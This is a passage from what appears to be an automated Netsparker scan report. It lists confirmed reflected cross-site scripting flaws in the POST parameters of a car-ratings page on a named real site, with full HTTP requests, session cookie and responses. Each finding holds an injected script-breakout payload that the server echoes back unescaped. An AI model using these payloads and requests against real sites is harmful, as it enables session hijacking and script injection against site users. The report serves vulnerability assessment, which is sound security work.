/> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr> <tr><td>2.</td><td>&l..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000B79)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B79)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:49:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="'"--></style></script><script>netsparker(0x000B79)</script>" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr> <tr><td>2.</td><td>&l..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x000BA9)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BA9)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:49:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="'"--></style></script><script>netsparker(0x000BA9)</script>" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr> <tr><td>2.</td><td>&l..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST '"--></style></script><script>alert(0x000C1A)</script>
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C1A)%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:50:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> <td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a 